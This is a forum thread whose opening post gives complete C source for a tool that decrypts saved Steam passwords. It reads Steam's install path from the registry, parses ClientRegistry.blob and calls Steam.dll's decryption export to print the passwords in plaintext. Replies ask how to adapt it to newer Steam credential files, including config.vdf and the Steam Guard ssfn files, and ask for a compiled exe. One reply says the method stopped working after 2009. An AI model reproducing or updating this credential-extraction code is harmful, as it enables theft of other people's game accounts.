Jump to content
Gonzalez

[C]Steam Pass Decrypter (using Steam.dll)

Recommended Posts

Posted
It decrypt's the saved Steam Passwords using the Steam.dll.

(I've added two functions and cleaned up the source.)

If you want to learn something this is your chance.

by five-three-nine

//
// DecryptStoredSteamPassword.c
//
// Combines Luigi's ClientRegistry.blob parsing function(s)
// with VALVe's exported SteamDecryptDataForThisMachine() function
//
// small code changes and comments added by desxor
// again some changes and fuctions were added by Five-Three-Nine


#include <stdio.h>
#include <stdint.h>
#include <string.h>
#include <sys/stat.h>
#include <windows.h>

void GetSteamDic(char *Path);

void SteamParseEncryptedPassPhrase(uint8_t *fname);
uint8_t *find_data(uint8_t *buff, int buffsz, uint8_t *str);

typedef int (__cdecl *SteamDecryptDataForThisMachine_t)(char *a, int b, char *c, int d, int *e);
SteamDecryptDataForThisMachine_t SteamDecryptDataForThisMachine;

int main(int argc, char *argv[]) {
HANDLE hSteamDLL;

/* Find Steam Dir */
char SteamPath[100] = {};
char SteamDll[100] = {};
char SteamBlob[100] = {};
char SteamUser[100] = {};
GetSteamDic(SteamPath);

strcat(SteamDll,SteamPath);
strcat(SteamDll,"\\Steam.dll");

strcat(SteamBlob,SteamPath);
strcat(SteamBlob,"\\ClientRegistry.blob");

strcat(SteamUser,SteamPath);
strcat(SteamUser,"\\SteamApps\\*");

printf("%s\n%s\n%s\n%s\n\n",SteamPath,SteamDll,SteamBlob,SteamUser);

hSteamDLL = LoadLibrary(SteamDll);
if(!hSteamDLL) {
printf("\nError: the file STEAM.DLL has not been found.\n");
exit(1);
}

SteamDecryptDataForThisMachine = (void *)GetProcAddress(hSteamDLL, "SteamDecryptDataForThisMachine");
if(!SteamDecryptDataForThisMachine) {
printf("\nError: the function SteamDecryptDataForThisMachine has not been found.\n");
exit(1);
}

SteamParseEncryptedPassPhrase(SteamBlob);

FreeLibrary(hSteamDLL);


/* Addon: Find Steam Users */
printf("\nSteam User Names:\n");
HANDLE fHandle;
WIN32_FIND_DATA wfd;

fHandle=FindFirstFile(SteamUser,&wfd);

do
{
if (!( (wfd.cFileName[0]=='.') && ( (wfd.cFileName[1]=='.' && wfd.cFileName[2]==0) || wfd.cFileName[1]==0 ) ))
{
if (wfd.dwFileAttributes & FILE_ATTRIBUTE_DIRECTORY)
{
if((strcmp(wfd.cFileName,"SourceMods") != 0) && (strcmp(wfd.cFileName,"common") != 0))
{
printf("%s\n",wfd.cFileName);
}

}
}
}
while (FindNextFile(fHandle,&wfd));
FindClose(fHandle);

return(0);
}

void SteamParseEncryptedPassPhrase(uint8_t *fname) {
int len, fdsize, pwds;
uint16_t nlen;
uint8_t *fdbuff, *fdnext, *p, *buff;
char decpass[100];
struct stat xstat;
FILE *fd;

fd = fopen(fname, "rb");
if(!fd) {
printf("Could not open %s for reading/memory search.\n", fname);
exit(1);
} else {
fstat(fileno(fd), &xstat);
fdbuff = malloc(xstat.st_size);

if(!fdbuff) {
printf("Could not allocate file into memory.\n");

// comments for the following are pretty much the same as below so look there for
// a more detailed description of what's going on

len = strlen(fname);
fdsize = 64 + len;

fdbuff = malloc(fdsize);

p = fdbuff;
p += sprintf(p, "%-30s", "\x50\x68\x72\x61\x73\x65\x01\x50");

*(uint16_t *)p = 0;
p += 2;

*(uint32_t *)p = len;
p += 4 + 0;

strcpy(p, fname);

fclose(fd);
goto next;
}

// load our file into memory for searching and reading its data
fread(fdbuff, 1, xstat.st_size, fd);
fclose(fd);

fdsize = xstat.st_size;
}

next:
fdnext = fdbuff;
for(pwds = 0;; pwds++) {
// search for unique phrase text using memcmp(), using a great little function provided by Luigi A.
// his function will search the entire allocated memory for the data you specify and return with it
// if its found, otherwise null

p = find_data(fdnext, fdsize, "\x50\x68\x72\x61\x73\x65\x01\x50");

if(!p) {
if(pwds) break;
printf("An encrypted and stored password could not be located, exiting.\n");
exit(1);
}

// skip 30 bytes past the PHRASE text to the encrypted password until we come
// to "04 00" or simply 4, (0x04 + (0x00 * 256)), we now have 24 bytes remaining
p += 30;

// this is the 16 bit number we are looking for, save it in the following format:
// num = byte1 + (byte2 * 256)
nlen = *(uint16_t *)p;

// skip the next 2 bytes of the 16bit number we just saved
p += 2;

// after we skipped 2 bytes, we come to 32bit number (4 bytes) which should always be the
// size of our encrypted string, it should appear as "5c 00 00 00", which equals 0x5c or simply, 92
// save this in the same format as before
len = *(uint32_t *)p;

// now we skip the 4 bytes that we _just read_ PLUS the amount of bytes specified by the first
// 16 bit number we just saved, should be 2 bytes anyhow
// this should now bring us to our encrypted password located in ClientRegistry.blob which should be
// 92 (0x5c) characters long
p += 4 + nlen;

// an example of the data, provided by Luigi:
// 50 68 72 61 73 65 01 50 7e 00 00 00 00 00 00 00 Phrase.P~.......
// 04 00 04 00 00 00 01 00 00 00 02 00 00 00 04 00 ................
// 5c 00 00 00 02 00 00 00 39 41 46 41 42 44 39 36 \.......9AFABD96
// 32 30 43 45 43 34 39 31 46 38 33 44 43 45 31 32 20CEC491F83DCE12
// 36 33 33 44 39 43 44 41 41 44 45 30 42 36 46 46 633D9CDAADE0B6FF
// 41 32 42 42 45 30 31 32 45 38 39 32 37 33 36 39 A2BBE012E8927369
// 35 32 35 37 43 44 43 45 39 35 37 32 41 37 30 38 5257CDCE9572A708
// 38 42 32 43 41 43 30 33 37 44 43 38 33 33 36 33 8B2CAC037DC83363
// 33 33 35 35 12 00 2a 00 00 00 43 6c 6f 63 3355..*...Cloc

fdsize -= (p - fdnext);
fdnext = p;

// as long as our length is greater than zero but no bigger than fdsize, execute the exported decryption function
if((len > 0) && (len < fdsize)) {
// null terminate the end of our string, otherwise it will cause problems
p[len] = 0;

printf("Found stored encrypted password:\n \"%s\"\n\n", p);

if(!SteamDecryptDataForThisMachine(p, strlen(p), decpass, sizeof(decpass), &len)) {
printf("Password: %.*s\n\n", len, decpass);
} else {
printf("Unable to decrypt the stored password, is this the same machine it was encrypted on?\n");
}
}
}

free(fdbuff);
}

uint8_t *find_data(uint8_t *buff, int buffsz, uint8_t *str) {
int strsz;
uint8_t *limit;

strsz = strlen(str);
limit = buff + buffsz - strsz;

for(; buff <= limit; buff++) {
if(!memcmp(buff, str, strsz)) return(buff);
}

return(NULL);
}

void GetSteamDic(char *Path) {
HKEY hKey;
DWORD size;

RegOpenKey(HKEY_LOCAL_MACHINE, "Software\\Valve\\Steam", &hKey);
RegQueryValueEx(hKey, "InstallPath", NULL, NULL,Path, &size);
RegCloseKey(hKey);
}

Posted

Maybe you can try make it work with the new encryption? The password is now stored in theese files:

SteamAppData.vdf and and config.vdf and the steam guard file. Steam guard file starts with ssfn and a lot of numbers, example;

ssfn340021771942606398

You can find the steam guard file in your steam directory, and for the other files steam\config\

What is the difference between this and:

https://rstforums.com/forum/17013-c-steam-decrypt.rst

Is ^ the new one? Maybe you could tell a noob like me on what programs to use and how to compile the code?

Or maybe you could supply an already compiled exe? :D

Posted
Maybe you can try make it work with the new encryption? The password is now stored in theese files:

SteamAppData.vdf and and config.vdf and the steam guard file. Steam guard file starts with ssfn and a lot of numbers, example;

ssfn340021771942606398

You can find the steam guard file in your steam directory, and for the other files steam\config\

What is the difference between this and:

https://rstforums.com/forum/17013-c-steam-decrypt.rst

Is ^ the new one? Maybe you could tell a noob like me on what programs to use and how to compile the code?

Or maybe you could supply an already compiled exe? :D

Don't you see this post is 4 years old?

Posted
deci daca ii cer cuiva steam.dll ii pot lua parola?

Nu.Chestia asta mergea acu cativa ani,au schimbat modul de criptare al parolei.Si oricum stiu ca mergea doar pe calculatorul unde este logat respectivul pentru ca avea nevoie de niste intrari din registrii windows-ului.

Steam password decoder 0.2.4 (steampwd)

IMPORTANT NOTE: from the 29 Sep 2009 Steam no longer saves the full password so this tool is now totally useless.

decrypts the passwords stored in the local ClientRegistry.blob file and the ConnectCache cookies in the registry.

remember that Steam uses an unique key to encrypt the password so if you have reinstalled your Windows you could be not able to recover it, the only exception is with Vista where the key is usually ever the same due to some technical reasons.

works also from command-line allowing to pass directly the encrypted password and the needed key.

the tool automatically tests the NoMachineSpecificPassphraseAvailable key if the provided/calculated one is wrong (1.0.0.0)

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.



×
×
  • Create New...